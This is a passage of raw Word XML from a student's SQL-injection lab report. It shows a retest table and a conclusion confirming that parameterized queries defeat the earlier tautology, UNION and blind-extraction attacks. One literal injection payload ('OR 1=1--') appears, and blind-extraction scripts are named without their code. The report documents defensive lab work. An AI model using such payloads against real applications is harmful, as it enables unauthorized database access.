    <w:p w14:paraId="529295AA" w14:textId="5C848036" w:rsidR="00DE6A7B" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00DE6A7B">
      <w:r w:rsidRPr="00E21894">
        <w:t>Each earlier attack was replayed against the patched application.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2700"/>
        <w:gridCol w:w="8090"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E21894" w:rsidRPr="00E21894" w14:paraId="36DB1153" w14:textId="77777777" w:rsidTr="00E254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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A879FB4" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8090" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20069050" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t>Result after the fix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21894" w:rsidRPr="00E21894" w14:paraId="4D643BB7" w14:textId="77777777" w:rsidTr="00E254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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D3462D7" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:lastRenderedPageBreak/>
              <w:t>1 &amp; 2 (tautology)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8090" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DC082BC" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t>zzzz' OR 1=1-- now returns "0 matches." instead of every ticket in the system (Figure 6.4a).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21894" w:rsidRPr="00E21894" w14:paraId="69805851" w14:textId="77777777" w:rsidTr="00E2541B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1953B805" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t>3 (UNION dump)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8090" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BC757CE" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t>See Section 6.3 above — 0 matches, no credentials disclosed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21894" w:rsidRPr="00E21894" w14:paraId="072072A1" w14:textId="77777777" w:rsidTr="00E254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hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BC91D7F" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t>4 (blind, match-count)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8090" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D7D9DED" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t>blind_extract.py was rerun unmodified against the patched app. Every oracle query returned false, so the length binary search converged on 0 and no characters were recovered (Figure 6.4b).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E21894" w:rsidRPr="00E21894" w14:paraId="52D207D0" w14:textId="77777777" w:rsidTr="00E2541B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02DA42C3" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t>5 (blind, timing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8090" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A3FF621" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E21894">
              <w:t>blind_extract_time.py was rerun unmodified against the patched app. No response was ever delayed, since pg_sleep() never executes; the length search again converged on 0 (Figure 6.4c).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7286E307" w14:textId="38F0F032" w:rsidR="00E2541B" w:rsidRDefault="00E2541B" w:rsidP="00E2541B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table 6.4: Result after the fix vs </w:t>
      </w:r>
      <w:r w:rsidR="00DE6A7B">
        <w:t>Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E828D65" w14:textId="62A51797" w:rsidR="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
      <w:r w:rsidRPr="00E21894">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01FA82B9" wp14:editId="7C3B91B3">
            <wp:extent cx="6858000" cy="3009900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30371624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858000" cy="3009900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1633C8AC" w14:textId="517A97BC" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 6.4a: Tautology payload after the fix: 0 matches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66028BEE" w14:textId="386A12BD" w:rsidR="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
      <w:r w:rsidRPr="00E21894">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="027593F4" wp14:editId="6EFE9A15">
            <wp:extent cx="6858000" cy="733425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="48780064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858000" cy="733425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABF0BC5" w14:textId="5354740B" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 6.4b: blind_extract.py after the fix: password length 0, nothing recovered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E334407" w14:textId="4C570300" w:rsidR="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
      <w:r w:rsidRPr="00E21894">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73B9B994" wp14:editId="3307C681">
            <wp:extent cx="6858000" cy="695325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="185927544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858000" cy="695325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17529066" w14:textId="55B2FABD" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 6.4c: blind_extract_time.py after the fix: password length 0, nothing recovered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA2DB05" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00E21894">
        <w:t>6.5 Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B90C54" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00E21894" w:rsidRDefault="00E21894" w:rsidP="00E21894">
      <w:r w:rsidRPr="00E21894">
        <w:t xml:space="preserve">All five objectives depended on a single unparameterized cursor.execute() call in advanced_ticket_search(). Replacing string concatenation with a parameterized placeholder closed </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21894">
        <w:lastRenderedPageBreak/>
        <w:t>every attack path used in this lab, error-based, UNION-based, boolean-blind, and time-blind alike, since they all relied on the same underlying ability to break out of the SQL string literal. Retesting each payload unmodified against the patched code confirmed none of them recovers any data, changes the result set, or produces a measurable timing difference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57916C2F" w14:textId="77777777" w:rsidR="00E21894" w:rsidRPr="00765509" w:rsidRDefault="00E21894" w:rsidP="00765509"/>
    <w:p w14:paraId="1CE27E7F" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="003A58FB" w:rsidRDefault="001221CA" w:rsidP="001221CA"/>
    <w:p w14:paraId="4CBA84B9" w14:textId="6C61B4E8" w:rsidR="00205E75" w:rsidRDefault="00205E75" w:rsidP="00205E75"/>
    <w:p w14:paraId="2718D71E" w14:textId="773E1D48" w:rsidR="00C16241" w:rsidRDefault="00C16241" w:rsidP="00205E75"/>
    <w:p w14:paraId="213035C4" w14:textId="0D0CC769" w:rsidR="00C16241" w:rsidRDefault="00C16241" w:rsidP="00205E75"/>
    <w:p w14:paraId="0964D3E2" w14:textId="0F21542A" w:rsidR="00C16241" w:rsidRDefault="00C16241" w:rsidP="00205E75"/>
    <w:p w14:paraId="41D9BB3C" w14:textId="53B3EA6F" w:rsidR="00031DB8" w:rsidRDefault="00031DB8" w:rsidP="00205E75"/>
    <w:p w14:paraId="1AA40FC8" w14:textId="52D89366" w:rsidR="00C16241" w:rsidRDefault="00C16241" w:rsidP="00205E75"/>
    <w:p w14:paraId="0A2387CA" w14:textId="10399B82" w:rsidR="00031DB8" w:rsidRDefault="00031DB8" w:rsidP="00205E75"/>
    <w:p w14:paraId="0E7AE941" w14:textId="77777777" w:rsidR="00031DB8" w:rsidRPr="00205E75" w:rsidRDefault="00031DB8" w:rsidP="00205E75"/>
    <w:sectPr w:rsidR="00031DB8" w:rsidRPr="00205E75" w:rsidSect="005F5660">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="72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201"/>
    <w:rsid w:val="00014167"/>
    <w:rsid w:val="00031DB8"/>
    <w:rsid w:val="001221CA"/>
    <w:rsid w:val="001225CA"/>
    <w:rsid w:val="001B6D66"/>
    <w:rsid w:val="001C09E0"/>
    <w:rsid w:val="00205E75"/>
    <w:rsid w:val="003A58FB"/>
    <w:rsid w:val="0041151F"/>
    <w:rsid w:val="004A4D58"/>
    <w:rsid w:val="005F5467"/>
    <w:rsid w:val="005F5660"/>
    <w:rsid w:val="00665201"/>
    <w:rsid w:val="00762AF6"/>
    <w:rsid w:val="00765509"/>
    <w:rsid w:val="0076637F"/>
    <w:rsid w:val="007B5E2B"/>
    <w:rsid w:val="007D607C"/>
    <w:rsid w:val="0083121F"/>
    <w:rsid w:val="008F3828"/>
    <w:rsid w:val="00AD40BF"/>
    <w:rsid w:val="00B1268E"/>
    <w:rsid w:val="00BC6B00"/>
    <w:rsid w:val="00C16241"/>
    <w:rsid w:val="00D358C4"/>
    <w:rsid w:val="00D83108"/>
    <w:rsid w:val="00DE6A7B"/>
    <w:rsid w:val="00E12E7D"/>
    <w:rsid w:val="00E21894"/>
    <w:rsid w:val="00E2541B"/>
    <w:rsid w:val="00EB7477"/>
    <w:rsid w:val="00FE46D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969A7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{65799681-B104-48B3-8628-3606DC7972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2AF6"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="006652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652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652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52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52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52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52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52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52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52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652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652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52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52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52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52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52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5201"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="006652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52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52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52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5201"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00665201"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00665201"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00665201"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="006652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5201"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00665201"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00E12E7D"/>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E12E7D"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00E12E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E12E7D"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0E2841" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="GridTable4-Accent1">
    <w:name w:val="Grid Table 4 Accent 1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="00031DB8"/>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customXml" Target="../customXml/item2.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5FE4D41D9F9411BBB1FDF543C2707DC"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{55848147-8256-430C-8C13-EE78B01A3E27}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="004423D8" w:rsidRDefault="0073142E" w:rsidP="0073142E">
          <w:pPr>
            <w:pStyle w:val="95FE4D41D9F9411BBB1FDF543C2707DC"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
              <w:caps/>
              <w:color w:val="156082" w:themeColor="accent1"/>
              <w:sz w:val="80"/>
              <w:szCs w:val="80"/>
            </w:rPr>
            <w:t>[Document title]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="51EEF364E0EC4FDCA605D0360F349136"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{E250A21A-52B0-405F-A59C-60A6D671223A}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="004423D8" w:rsidRDefault="0073142E" w:rsidP="0073142E">
          <w:pPr>
            <w:pStyle w:val="51EEF364E0EC4FDCA605D0360F349136"/>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42E"/>
    <w:rsid w:val="00014167"/>
    <w:rsid w:val="0041151F"/>
    <w:rsid w:val="004423D8"/>
    <w:rsid w:val="004C252B"/>
    <w:rsid w:val="006223A1"/>
    <w:rsid w:val="006318DD"/>
    <w:rsid w:val="0073142E"/>
    <w:rsid w:val="009D339D"/>
    <w:rsid w:val="00BC6B00"/>
    <w:rsid w:val="00EB747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5FE4D41D9F9411BBB1FDF543C2707DC">
    <w:name w:val="95FE4D41D9F9411BBB1FDF543C2707DC"/>
    <w:rsid w:val="0073142E"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="51EEF364E0EC4FDCA605D0360F349136">
    <w:name w:val="51EEF364E0EC4FDCA605D0360F349136"/>
    <w:rsid w:val="0073142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2026-09-27T00:00:00</PublishDate>
  <Abstract/>
  <CompanyAddress>Ziad Abillama</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A0AA722-9041-40F9-A1AD-7EFBE93B7D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27</Pages>
  <Words>4933</Words>
  <Characters>28122</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>234</Lines>
  <Paragraphs>65</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>Title</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="1" baseType="lpstr">
      <vt:lpstr>Lab 1 – SQL Injection</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>32990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1 – SQL Injection</dc:title>
  <dc:subject>EECE503M: Software &amp; AI Security</dc:subject>
  <dc:creator>L'Emir Ziad Abi El Lamah (Student)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>L'Emir Ziad Abi El Lamah (Student)</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-24T04:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-24T05:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>